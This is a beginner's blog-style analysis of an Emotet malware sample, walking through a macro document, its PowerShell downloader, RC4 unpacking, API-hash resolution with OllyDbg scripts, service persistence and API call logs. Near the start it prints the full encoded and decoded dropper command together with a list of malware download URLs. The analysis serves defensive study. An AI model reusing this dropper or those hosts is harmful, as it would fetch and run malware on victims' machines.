[Original] Emotet Malware Analysis

2020-9-21 11:00

Emmmm, I'm a beginner who just got started, and together with VirtualCC I analyzed this malware; it's one that has suddenly flared up again recently.

Emotet

Sample: PO# 09012020Ex.doc

Workflow:

Obtained the document.

Once it is opened the malicious macro code should start executing; press Alt+F11.

Debug it and extract the PowerShell:

```vb
Dim y
' x holds the pieces of the obfuscated command; Join glues them into one string
y = Join(x, "")
' print the reconstructed command to the Immediate window
Debug.Print y
```
The Debug.Print output (a single base64 string, wrapped here across lines):
powersheLL -e JABZAHgAeABuAGkAZgAwAD0AKAAnAEMAJwArACgAJwA2ACcAKwAnAGQAbQBiAGYAJwApACsAJwA4ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBzAEUAUgBQAFIATwBmAEkAbABFAFwAeQBlAEQAegBiAHEANQBcAFAARgAyAHEAUAAyAFUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAEMAVQByAEkAVAB5AGAAUABSAE8AYABUAGAATwBjAG8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAnACsAJwAsACAAdABsAHMAMQAxACwAIAB0AGwAJwApACsAJwBzACcAKQA7ACQAUwB2AHkAawBqAHUAcgAgAD0AIAAoACcASgAnACsAKAAnADMAJwArACcAcwBhACcAKQArACcAdAAnACsAKAAnADgAbgAnACsAJwB4AGEAJwApACkAOwAkAE4AYQBlADUAcwBfAGEAPQAoACcASQAnACsAKAAnAHgAOAAnACsAJwBkADUAJwApACsAJwA0AGYAJwApADsAJABDADUAagBlAGYANgBrAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAFoAJwArACgAJwBLACcAKwAnAHYAWQBlACcAKwAnAGQAegBiACcAKQArACgAJwBxADUAWgBLAHYAUAAnACsAJwBmACcAKwAnADIAJwApACsAKAAnAHEAcAAyAHUAJwArACcAWgAnACkAKwAnAEsAdgAnACkALgAiAFIARQBgAFAATABBAGAAQwBFACIAKAAoACcAWgBLACcAKwAnAHYAJwApACwAWwBTAFQAcgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkAKwAkAFMAdgB5AGsAagB1AHIAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABQAGgAbgByADgAcQBqAD0AKAAnAEMAJwArACgAJwB5AGkAdQByAGIAJwArACcAagAnACkAKQA7ACQAUAB1AGIAMQBoAHIAagA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AGUAQgBDAEwASQBlAE4AdAA7ACQATwBuADQANAA5ADEAcAA9ACgAKAAnAGgAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAnACsAJwAvAHYAJwApACsAJwBpACcAKwAoACcAZAByAGkAbwBkACcAKwAnAGUAYwAnACsAJwBvAHIAJwApACsAJwBhACcAKwAoACcAYwAnACsAJwBpAG8AJwApACsAKAAnAG4AJwArACcALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACgAJwB3AHAALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuAC8ATQAnACsAJwBJACcAKQArACcASAAvACcAKwAnACoAJwArACgAJwBoAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AdgAnACsAKAAnAGEAJwArACcAbgBiACcAKQArACgAJwByAGEAcwAnACsAJwB0ACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALwAnACsAJwBiACcAKwAnAGwAJwArACcAZQAnACsAKAAnAGUAYwBoAC8AZgBSACcAKwAnAC8AJwApACsAJwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8Adg
AnACsAJwBhAHIAaQB2AG8AJwArACcAZABhAC4AJwApACsAJwBjAG8AJwArACcAbQAnACsAJwAvACcAKwAoACcAYwBnACcAKwAnAGkAJwApACsAKAAnAC0AJwArACcAYgAnACsAJwBpAG4ALwA4ADkAJwApACsAJwA3AC8AJwArACgAJwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKwAnAHcAJwApACsAKAAnAGEAawAnACsAJwBhAG4AJwApACsAKAAnAC0AdAAnACsAJwBhAG4AawAnACkAKwAoACcAYQAuACcAKwAnAG8AcgBnAC8AJwApACsAKAAnAEsAbAAnACsAJwBlAGkAJwApACsAKAAnAG4AdAAnACsAJwBlACcAKwAnAGkAbABlAC8ARQAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8ALwB3ACcAKwAnAHcAdwAuAHcAZQBiAGgAbwAnACsAJwBzAHQANAAnACsAJwBjACcAKwAnAGgAJwArACcAcgBpAHMAdAAnACsAJwAuACcAKQArACcAbwAnACsAJwByAGcAJwArACgAJwAvACcAKwAnAEwAQQAnACkAKwAnAE0AJwArACcAQgAvACcAKwAoACcARAAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAvAC8AdwBoACcAKQArACgAJwBpACcAKwAnAHQAZQAtAG8AJwApACsAKAAnAG4ALQByACcAKwAnAGkAYwAnACsAJwBlAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBMACcAKwAnAG8AJwArACgAJwBnACcAKwAnAG8AcwAvACcAKwAnAFUALwAnACkAKwAnACoAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8ALwB6AGEAaAAnACsAJwBuACcAKwAnAGEAJwArACcAcgB6AHQAJwApACsAKAAnAC0AZgAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAcwBiACcAKwAnAHUAJwApACsAJwByACcAKwAoACcAZwAnACsAJwAuAGMAbwBtACcAKQArACcALwAnACsAKAAnAGMAZwAnACsAJwBpAC0AYgAnACsAJwBpAG4ALwAnACkAKwAoACcATAAnACsAJwA4AC8AJwApACkALgAiAHMAUABMAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgA4AHcAMAB1AGoAbQA9ACgAJwBJACcAKwAoACcAbgAnACsAJwA1AGoAZAAnACkAKwAnAGoAMAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABOADUANQBxAGUAeAB2ACAAaQBuACAAJABPAG4ANAA0ADkAMQBwACkAewB0AHIAeQB7ACQAUAB1AGIAMQBoAHIAagAuACIAZABPAFcATgBMAGAAbwBhAEQARgBJAGAATABFACIAKAAkAE4ANQA1AHEAZQB4AHYALAAgACQAQwA1AGoAZQBmADYAawApADsAJABXAGQAbABnAGsAdQBwAD0AKAAoACcAVABtACcAKwAnADIAJwApACsAJwA2ACcAKwAoACcAMgAnACsAJwBxAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAQwA1AGoAZQBmADYAawApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAAMgA1ADIAOAA1ACkAIAB7AC4AKAAnAEkAbgB2AG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEMANQBqAGUAZgA2AGsAKQA7ACQAVwAyADkAaABnADYAbgA9ACgAKAAnAEcAZQB0AHcAJwArACcAXwAnACkAKwAnAHkANg
AnACkAOwBiAHIAZQBhAGsAOwAkAE4AegBuADIAZAAyADQAPQAoACcATgAnACsAKAAnAGgAaQBzACcAKwAnAHIAJwApACsAJwBuADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPADgAaABzAGEAdAB5AD0AKAAnAFkAJwArACcAbQAnACsAKAAnAGIAcAA4AHIAJwArACcAMwAnACkAKQA=

`-e` means PowerShell accepts the command as a base64-encoded string. Decoded, it reads:

```powershell
$Yxxnif0=(C6dmbf8);
# create a directory under the user profile
&(new-item) $env:usERPROfIlE\yeDzbq5\PF2qP2U\ -itemtype diREcTORy;
[Net.ServicePointManager]::"SeCUrITyPROTOcoL" = (tls12, tls11, tls);
$Svykjur = (J3sat8nxa);
$Nae5s_a=(Ix8d54f);
# build the target path under the user profile; the 'ZKv' markers are replaced with '\' ([char]92)
$C5jef6k=$env:userprofile(ZKv Yedzbq5 ZKv Pf2qp2u ZKv."REPLACE"ZKv,[STrinG][cHAR]92)$Svykjur.exe;
$Phnr8qj=(Cyiurbj);
$Pub1hrj=&(new-object) NEt.weBCLIeNt;
# the URL list is a single string split on [char]42 ('*')
$On4491p= http://vidriodecoracion.com/wp-admin/MIH/*
          http://vanbrast.com/bleech/fR/*
          http://varivoda.com/cgi-bin/897/*
          http://wakan-tanka.org/Kleinteile/E/*
          https://www.webhost4christ.org/LAMB/D/*
          http://white-on-rice.com/Logos/U/*
          http://zahnarzt-flensburg.com/cgi-bin/L8/."sPLit"[char]42;
$J8w.ujm=(In5jdj.);
# try each URL in turn; the first download of at least 25285 bytes is executed
foreach($N55qexv in $On4491p)
{
  try{
    $Pub1hrj."dOWNLoaDFILE"($N55qexv, $C5jef6k);
    $Wdlgkup=(Tm262qh);
    If ((&Get-Item $C5jef6k)."lENgTh" -ge 25285)
    {.(Invoke-Item)($C5jef6k);
     $W29hg6n=(Getw_y6);
     break;
     $Nzn2d24=(N(hisr)n7)
    }
  }
  catch{}
}
$O8hsaty=(Ym(bp8r3))
```

The variable On4491p is the URL list:

```
http://vidriodecoracion.com/wp-admin/MIH/
http://vanbrast.com/bleech/fR/
http://varivoda.com/cgi-bin/897/
http://wakan-tanka.org/Kleinteile/E/
https://www.webhost4christ.org/LAMB/D/
http://white-on-rice.com/Logos/U/
http://zahnarzt-flensburg.com/cgi-bin/L8/
```
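Added example, not part of the original post: a small Python helper that does what the author did by hand above, decoding a `-e` payload (base64 of the UTF-16LE script text) and collapsing the `('a'+'b')` string splitting so the URL list, which the script splits on `[char]42`, can be read off. It runs on a constructed sample written in the same style; the hosts in it are made up and are not the ones from the real payload.

```python
import base64
import re

# Constructed sample in the same style as the macro's payload: pieces joined
# with '+', wrapped in parentheses, backticks inside member names, and the URL
# list split on [char]42 ('*'). The hosts are made up for this example.
SAMPLE_PLAIN = (
    "$On4491p=(('ht'+'tp')+(':/'+'/ex')+'ample'+('.te'+'st/')+'a/*'"
    "+('htt'+'ps:/')+'/example'+('.inv'+'alid/b/')).\"sPL`it\"([char]42);"
    "$Pub1hrj=&('new-'+'o'+'bjec'+'t') NEt.weBCLIeNt;"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PLAIN.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """powershell -e / -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


_DQUOTED = re.compile(r'"([^"]*)"')                   # "sPL`it"
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b'
_PAREN = re.compile(r"\(\s*'([^']*)'\s*\)")            # ('a')
_SQUOTED = re.compile(r"'([^']*)'")


def deobfuscate(script: str) -> str:
    """Collapse the string-splitting obfuscation until nothing changes."""
    # 1. backticks inside double-quoted member names are no-ops: "sPL`it" -> "sPLit"
    script = _DQUOTED.sub(lambda m: '"' + m.group(1).replace("`", "") + '"', script)
    # 2. merge 'a'+'b' into 'ab' and strip ('a') to 'a', to a fixed point
    while True:
        merged = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        merged = _PAREN.sub(lambda m: "'" + m.group(1) + "'", merged)
        if merged == script:
            return merged
        script = merged


def extract_urls(script: str) -> list:
    """Return the download URLs: every literal containing http, split on '*'."""
    urls = []
    for literal in _SQUOTED.findall(deobfuscate(script)):
        if "http" in literal:
            urls.extend(u for u in literal.split("*") if u.startswith("http"))
    return urls
```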

The sample is an attachment downloaded from the email. Breaking on VirtualAlloc shows a memory operation:

flProtect is 0x40 (PAGE_EXECUTE_READWRITE, i.e. readable, writable and executable)

The first stage is decrypted dynamically by something resembling RC4.

The 2048 bytes that are decrypted dynamically were dumped out and loaded into IDA again:
it is standard RC4 decryption.
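Added example, not code from the post or from the sample: a standard RC4 routine (KSA + PRGA) of the kind the unpacking stage uses, together with the cheap MZ/PE check an analyst applies to the decrypted buffer. The key and the encrypted buffer are constructed here; in practice both come from the debugger, and the 2048-byte dump takes the place of `ENCRYPTED_BLOB`.

```python
# Added example, not code from the post or the sample: standard RC4
# (KSA + PRGA) as used by the unpacking stage, plus the MZ/PE check an
# analyst runs on the decrypted buffer. Key and blob below are constructed.

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: one routine both encrypts and decrypts."""
    # Key-scheduling algorithm: permute S[] under the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation: XOR each byte with the keystream
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def looks_like_pe(buf: bytes) -> bool:
    """'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (the DWORD at 0x3C)."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(buf[0x3C:0x40], "little")
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_fake_pe() -> bytes:
    """Constructed stand-in for the decrypted payload: DOS header whose e_lfanew points at 'PE\\0\\0'."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    return bytes(hdr) + b"PE\0\0" + bytes(20)


SAMPLE_KEY = b"constructed-key"                     # constructed, not the sample's key
ENCRYPTED_BLOB = rc4(SAMPLE_KEY, build_fake_pe())   # stands in for the 2048-byte dump


def recover_pe(key: bytes, blob: bytes):
    """Decrypt a dumped buffer and return it only if a PE header appears."""
    plain = rc4(key, blob)
    return plain if looks_like_pe(plain) else None
```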

 

This stage also decrypts dynamically, but the decrypted result contains a PE file, so it was dumped directly.

It has no import table.
It resolves APIs through hash values, a common shellcode technique, which makes it hard to see which API is being called. Inside sub_40481D a large flattened switch-case is used to disrupt analysis, similar to OLLVM control-flow flattening, but OllyDbg has ODScript scripts for this:

```
//FIND eip,#FFD683c4148BCDE8#
//CMP $RESULT,0
//JE exit
//STI
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
VAR apiName
VAR addr
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax

FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI

loop:
FIND tmpAddr,#E8????FFFF59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop

exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
FIND tmp,#E81AFDFFFF3529E15B09#
MOV addr,$RESULT
BP $RESULT
RUN
COB
MOV tmpAddr,0

Loop1:
CMP tmpAddr,0
JNE HasInit
MOV tmpAddr,eip
HasInit:
STI
RUN
COB
Find:
// stash the API function name
LEN [ecx]
MOV apiName,[ecx],$RESULT
STO
STO
STO
CMP !ZF,1
// if they match, write to the file
JE Write
RUN
COB
JMP Find
Write:
WRTA "HASH.TXT",tmpAddr
WRTA "HASH.TXT",apiName
MOV tmpAddr,0
RUN
COB
JMP Loop1

MSG "参数获取完毕"
ret
```
```
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax

FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI

loop:
FIND tmpAddr,#E8????FFFF59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop

exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
//RUN
//COB
//Loop1:
//MOV tmpAddr,eip
//STI
//MOV para3,[esp+4]
//MOV para2,ecx
//MOV para1,edx
//WRTA "HASH.TXT",tmpAddr
//WRTA "HASH.TXT",para1
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para2
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para3

//RUN
//COB
//JMP Loop1

MSG "脚本执行完毕"
ret
```

Looking at these APIs, the whole flow should be clear (HASH.TXT as written by the script: call-site address, resolved API name):

```
tmpAddr  apiName
402E20   GetProcessHeap
402E20   GetProfileSectionW
402E20   HeapAlloc
402E20   GetModuleHandleA
402E20   RtlAllocateHeap
404FFD   LoadLibraryW
402F9F   HeapFree
402FBF   HeapFree
402F9F   GetProcessHeap
404FFD   crypt32.dll
404FFD   shell32.dll
404FFD   urlmon.dll
404FFD   userenv.dll
404FFD   wtsapi32.dll
404FFD   wininet.dll
406950   OpenSCManagerW
4069E5   CloseServiceHandle
4069BE   SHGetFolderPathW
405791   GetModuleFileNameW
4057B4   PathSkipRootW
405765   PathFindExtensionW
4057F6   lstrcpynW
406900   GetModuleFileNameW
402E20   _snwprintf
402F9F   GetProcessHeap
402E20   FindFirstFileW
402E20   FindNextFileW
402E20   FindClose
40664C   GetCommandLineW
406530   CommandLineToArgvW
406607   LocalFree
405B92   GetModuleFileNameW
405C0B   CreateFileW
405BB6   GetFileInformationByHandleEx
405BDE   CloseHandle
405C42   GetSystemTimeAsFileTime
4062CC   OpenServiceW
406263   CloseServiceHandle
40640C   GetTickCount
4063C7   lstrcpyW
4063DC   lstrlenW
4064AE   lstrlenW
4067F3   GetTickCount
40680B   GetCurrentProcessId
402F7C   memset
402F7C   memset
402E20   SHFileOperationW
4060FD   GetModuleFileNameW
402F7C   memset
402F7C   memset
402E20   DeleteFileW
405ADE   GetSystemTimeAsFileTime
405A3C   CreateFileW
405A06   SetFileInformationByHandle
405FEF   OpenSCManagerW
405EE7   CreateServiceW
4039AA   EnumServicesStatusExW
403A9d   QueryServiceConfig2W
403957   ChangeServiceConfig2W
402F9F
406014   WaitForSingleObject
405CD0
402F7C   CreateProcessW
4035E0   ExitProcess
```

Back to the original dump file, to see what the flow does:

Allocating the memory for the mapped (stretched) image:

Entry point:

Execution of the real work starts here. APIs hidden behind hash values are easiest to identify by dynamic debugging: the resolved address is returned in EAX, so we simply step through in the debugger.

It copies the executable into C:\Windows\SysWOW64; the folder and file names are random, and the two files are identical.

It registers the current exe as a service with an automatic start type, so the exe stays resident. In OllyDbg this corresponds to the following (the names in the screenshots don't match because the re-run differed somewhat from the earlier run):

Debugging the service (method):

After searching through many posts I found how to debug a service; recording it here for future use: https://bbs.pediy.com/thread-229643.htm

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Change the service start timeout

Run the ODScript on the original exe:

```
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax

FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI

loop:
FIND tmpAddr,#E8????????59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop

exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
//RUN
//COB
//Loop1:
//MOV tmpAddr,eip
//STI
//MOV para3,[esp+4]
//MOV para2,ecx
//MOV para1,edx
//WRTA "HASH.TXT",tmpAddr
//WRTA "HASH.TXT",para1
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para2
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para3

//RUN
//COB
//JMP Loop1

MSG "脚本执行完毕"
ret
```
```
//FIND eip,#FFD683c4148BCDE8#
//CMP $RESULT,0
//JE exit
//STI
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
VAR apiName
VAR addr
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax

FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI

loop:
FIND tmpAddr,#E8????????59FFD0#
CMP $RESULT,0
JE exit
MOV tmpAddr,$RESULT
ADD tmpAddr,6
BP tmpAddr
JMP loop

exit:
//FIND tmp,#E83CFFFFFF59FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E821FFFFFF59FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E85F09000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E81F09000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E87A05000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr

RUN
COB

LOOP2:
BC eip
LOG eax
RUN
COB
jmp LOOP2

MSG "参数获取完毕"
ret
```

The HTTP-related APIs observed:

When the request is made the thread halts, so we have to resume all threads.

```
0x622FFA     eax: 76EB14E9 | kernel32.GetProcessHeap
0x622EED     eax: 76EB1245 | kernel32.GetModuleHandleA
0x623015     eax: 777BE026 | ntdll_1.RtlAllocateHeap
0x625003     eax: 76EB492B | kernel32.LoadLibraryW
0x622FA5     eax: 76EB14E9 | kernel32.GetProcessHeap
0x622FC0     eax: 76EB14C9 | kernel32.HeapFree
0x626956     eax: 753ACA64 | advapi32.OpenSCManagerW
0x6269EB     eax: 753B369C | advapi32.CloseServiceHandle
0x6269C4     eax: 76245708 | shell32.SHGetFolderPathW
0x625797     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x6257BA     eax: 7735FBF5 | shlwapi.PathSkipRootW
0x62576B     eax: 7734A1B9 | shlwapi.PathFindExtensionW
0x6257FC     eax: 76EDD556 | kernel32.lstrcpynW
0x626906     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626A55     eax: 76245708 | shell32.SHGetFolderPathW
0x6229FE     eax: 777C2417 | ntdll_1._snwprintf
0x622A36     eax: 76EB4435 | kernel32.FindFirstFileW
0x6229BC     eax: 76EB54EE | kernel32.FindNextFileW
0x6225D7     eax: 7734A1B9 | shlwapi.PathFindExtensionW
0x622617     eax: 76EDD556 | kernel32.lstrcpynW
0x622B1F     eax: 76EB4442 | kernel32.FindClose
0x626652     eax: 76EB5223 | kernel32.GetCommandLineW
0x626536     eax: 761D9EE8 | shell32.CommandLineToArgvW
0x62660D     eax: 76EB2D3C | kernel32.LocalFree
0x625B98     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x625C11     eax: 76EB3F5C | kernel32.CreateFileW
0x625BBC     eax: 76ECC78F | kernel32.GetFileInformationByHandleEx
0x625BE4     eax: 76EB1410 | kernel32.CloseHandle
0x625C48     eax: 76EB3509 | kernel32.GetSystemTimeAsFileTime
0x6236DF     eax: 76ED735F | kernel32.CreateToolhelp32Snapshot
0x62369D     eax: 76ED8BAF | kernel32.Process32FirstW
0x623367     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x623737     eax: 76EB1410 | kernel32.CloseHandle
0x6232B1     eax: 76EB1986 | kernel32.OpenProcess
0x6232D3     eax: 76EC15F7 | kernel32.QueryFullProcessImageNameW
0x6232EA     eax: 76EB1410 | kernel32.CloseHandle
0x6266F9     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x626D61     eax: 76EB183E | kernel32.CreateEventW
0x626DA7     eax: 76EB34D5 | kernel32.CreateThread
0x626AF5     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626B11     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x624AA5     eax: 76ECEEE0 | kernel32.GetTickCount64
0x626B3D     eax: 76ECD851 | kernel32.FindFirstChangeNotificationW
0x624C84     eax: 76EB110C | kernel32.GetTickCount
0x626C89     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626CB8     eax: 76EB1809 | kernel32.GetCurrentProcess
0x626CCD     eax: 76EC15F7 | kernel32.QueryFullProcessImageNameW
0x626DEC     eax: 76EB1136 | kernel32.WaitForSingleObject
0x626CF8     eax: 76ECD5CD | kernel32.lstrcmpiW
0x626BA2     eax: 76EB4220 | kernel32.WaitForMultipleObjects
0x624CD2     eax: 76ECEEE0 | kernel32.GetTickCount64
0x621E8E     eax: 753ADF14 | advapi32.CryptAcquireContextW
0x622027     eax: 7569D718 | crypt32.CryptDecodeObjectEx
0x621ECA     eax: 753AC532 | advapi32.CryptImportKey
0x621EF5     eax: 76EB2D3C | kernel32.LocalFree
0x621F3D     eax: 753A8EE9 | advapi32.CryptGenKey
0x621FC0     eax: 753ADF4E | advapi32.CryptCreateHash
0x624B9C     eax: 76EB110C | kernel32.GetTickCount
0x624BD5     eax: 76ECEEE0 | kernel32.GetTickCount64
0x624550     eax: 76ECB6E0 | kernel32.GetComputerNameA
0x623C1C     eax: 76EB43E2 | kernel32.GetWindowsDirectoryW
0x623C6D     eax: 76ECC860 | kernel32.GetVolumeInformationW
0x624510     eax: 77864760 | ntdll_1._snprintf
0x6249C1     eax: 76EB5A4B | kernel32.lstrlenA
0x623B98     eax: 777C873A | ntdll_1.RtlGetVersion
0x623B5F     eax: 76EC10B5 | kernel32.GetNativeSystemInfo
0x623315     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x62332D     eax: 76EB1275 | kernel32.ProcessIdToSessionId
0x62478D     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x6247F2     eax: 76ED3102 | kernel32.lstrcpyW
0x624664     eax: 76EB1700 | kernel32.lstrlenW
0x6246D2     eax: 76ED3102 | kernel32.lstrcpyW
0x6246EA     eax: 76EB1700 | kernel32.lstrlenW
0x623CF5     eax: 76EB170D | kernel32.WideCharToMultiByte
0x623D2B     eax: 76EB170D | kernel32.WideCharToMultiByte
0x622FDF     eax: 777B2340 | ntdll_1.memcpy
0x621644     eax: 76EB110C | kernel32.GetTickCount
0x621C4A     eax: 753E3198 | advapi32.CryptDuplicateHash
0x621C0C     eax: 753C779B | advapi32.CryptEncrypt
0x621CE1     eax: 753A91EA | advapi32.CryptExportKey
0x621D81     eax: 753ADF7E | advapi32.CryptGetHashParam
0x621DB9     eax: 753ADF66 | advapi32.CryptDestroyHash
0x6214B6     eax: 777C2417 | ntdll_1._snwprintf
0x623761     eax: 777D01E3 | ntdll_1.RtlRandomEx
0x621350     eax: 76EB110C | kernel32.GetTickCount
0x621389     eax: 76EB110C | kernel32.GetTickCount
0x6213B6     eax: 777C2417 | ntdll_1._snwprintf
0x6215F9     eax: 777C2417 | ntdll_1._snwprintf
0x621822     eax: 76EB110C | kernel32.GetTickCount
0x6217F1     eax: 77864760 | ntdll_1._snprintf
0x62175D     eax: 77864760 | ntdll_1._snprintf
0x622290     eax: 75E01D76 | urlmon.ObtainUserAgentString
0x623DB3     eax: 76EB192E | kernel32.MultiByteToWideChar
0x623DDE     eax: 76EB192E | kernel32.MultiByteToWideChar
0x62223A     eax: 77259197 | wininet.InternetOpenW
0x6223DF     eax: 7725492C | wininet.InternetConnectW
0x622316     eax: 77254A42 | wininet.HttpOpenRequestW
0x62236A     eax: 7725BA12 | wininet.HttpSendRequestW
0x622171     eax: 77255C75 | wininet.HttpQueryInfoW
0x6222CC     eax: 7724AB49 | wininet.InternetCloseHandle
0x62243A     eax: 7724AB49 | wininet.InternetCloseHandle
0x62245F     eax: 7724AB49 | wininet.InternetCloseHandle
0x624F3A     eax: 76EB110C | kernel32.GetTickCount
0x624F73     eax: 76ECEEE0 | kernel32.GetTickCount64
0x622109     eax: 7724B406 | wininet.InternetReadFile
0x621AC3     eax: 753E3198 | advapi32.CryptDuplicateHash
0x621B4B     eax: 753E3178 | advapi32.CryptDecrypt
0x621B0A     eax: 753AC54A | advapi32.CryptVerifySignatureW
0x621A70     eax: 753ADF66 | advapi32.CryptDestroyHash
0x624EB2     eax: 76EB110C | kernel32.GetTickCount
0x624EEB     eax: 76ECEEE0 | kernel32.GetTickCount64
0x6258C6     eax: 777C2417 | ntdll_1._snwprintf
0x62587E     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x626308     eax: 753ACA64 | advapi32.OpenSCManagerW
0x6262D2     eax: 753ACA4C | advapi32.OpenServiceW
0x626269     eax: 753B369C | advapi32.CloseServiceHandle
0x625DB6     eax: 777C2417 | ntdll_1._snwprintf
0x625DEB     eax: 76ECD4DC | kernel32.GetTempPathW
0x625E0F     eax: 76EDD1B6 | kernel32.GetTempFileNameW
